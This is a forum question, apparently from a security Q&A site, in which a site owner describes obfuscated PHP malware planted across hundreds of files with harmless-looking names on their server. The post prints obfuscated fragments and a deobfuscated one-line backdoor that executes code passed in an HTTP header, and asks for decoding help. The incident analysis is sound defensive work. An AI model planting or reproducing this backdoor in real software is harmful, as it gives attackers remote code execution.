I found 3 php files in a htaccess-password-protected upload folder on my server:

 1. default_folders.php
 2. factory.php
 3. HMAC.php

Each of them contains a variable string, eg:

     'g J9XEmx7';$EhtjdM=Oe28.'~2'|'k!'.dE2t;$xQ8f8KBXUBG='w{{q{'._mqq&'i~~i{'./*uA'.
     '(cY*/_myw;$z5=AFD8SyFOB^'613W.&; >';$KNRdHxnCu7='{~o}v}'._ouosv.'}oo'&"{~"./*'.
     '^~kr*/uuww_o."}~k~ioo";$Q6Gzag3327='$'.UDH5b.' 51ZJ"BR@d K  `'.bbDPAHDY.#lSnw'.
     '^JB'|'"ED@4Q0T<ZC JQT +Lh.P3@@!'.YILHJPB;$P6JsS0J='t1r.tvW]^o{F{6nVI{'./*TfvX'.
     '1 01#&'|'&0"83$12';$Xt8sci4vYB2=(ZAL^'ve|')|$Virhp;$yzPne79=$EhtjdM&(#hj53qX5'.

I've managed to deobfuscate partially:


Does anyone know of a decoder for obfuscated php code that will work comprehensively? I have referenced similar source but didn't find them exceptionally helpful:

  1. Obfuscated php code found on server
  2. What does this malicious PHP script do?

Update (23 April 2015)

I found that it's not just these 3 files, but hundreds of files infesting deep nested directories of my web server.

Here are some of the file names of malicious PHP codes:

1. tcpdf_config.php
2. config_seo.php
3. pcltrace.lib.php
4. router.php
5. tinymce.php
6. mailto.php
7. ParanoidHTTPFetcher.php
8. Parse.php
9. xml_domit_nodemaps.php 
10. xml_saxy_shared.php
11. Renderer.php
12. ShortModifiers.php
13. strcasecmp.php
14. xmlrpc_wrappers.php
15. Nonce.php
16. strspn.php
17. IPv6.php
18. php_file_utilities.php
19. php_http_status_codes.php
20. plupload.flash.swf


Sample code of tcpdf_config.php:

$FZbD8L='EGuiUTb'&~FmJmI8;$a6Kda1pMgq='$@L'|'(H@';$zMoimIc='" %7 !13 "F&$$D 2"(`  B0$$'.
        '004 $#'|'2"!#001 $"D60%F! #9d 0B43 100 $#';$RaNu0EH='w3?;7()+=Ld>1'.so23r.'(u'.
        'Mn "CK'^'t;'.vuey);$ll6pVdJQF=$a6Kda1pMgq^(mN9^',b@');$i8u=(mcUkn.'*'^#rot0G8'.
        '1_r$R*/hthalX6.'~'.Kvyi);$drhyJoFD=$zMoimIc|$RaNu0EH;$BgP=(SLBvv.'(. ~b-'./*g'.
        'V+mUjM#N=8#zU ,Q1syDZ+b%a(K*+9F[NH~!ev|M~TyFuNXq%hMP&8T3';

and what I deobfuscate of it:

call_user_func(create_function(false, getenv('HTTP_X_H3G_MSISDN')));

I suspect this code has something to do with mobile hacking. And I am aware that the hacker could find this page easily by googling his own code.

My deobfuscating is still not comprehensive and I need advice on that. I want this post to offer a method of deobfuscating for other victims, then advise protection mechanisms.

  • possible duplicate of What does this malicious PHP script do?
    – gowenfawr
    Commented Apr 16, 2015 at 16:54
  • 2
    While the exact script is likely different, @armani's answer here is an excellent view of how these scripts can be unraveled.
    – gowenfawr
    Commented Apr 16, 2015 at 16:56
  • @gowenfawr Should we make a canonical answer?
    – schroeder
    Commented Apr 16, 2015 at 17:25
  • hey, thanks for your inputs. I am unable to decode the obfuscated code still trying multiple online resources. Any advice?
    – George
    Commented Apr 16, 2015 at 17:26
  • @schroeder it's the best answer I've seen to that effect, so it would make sense to me.
    – gowenfawr
    Commented Apr 16, 2015 at 17:36


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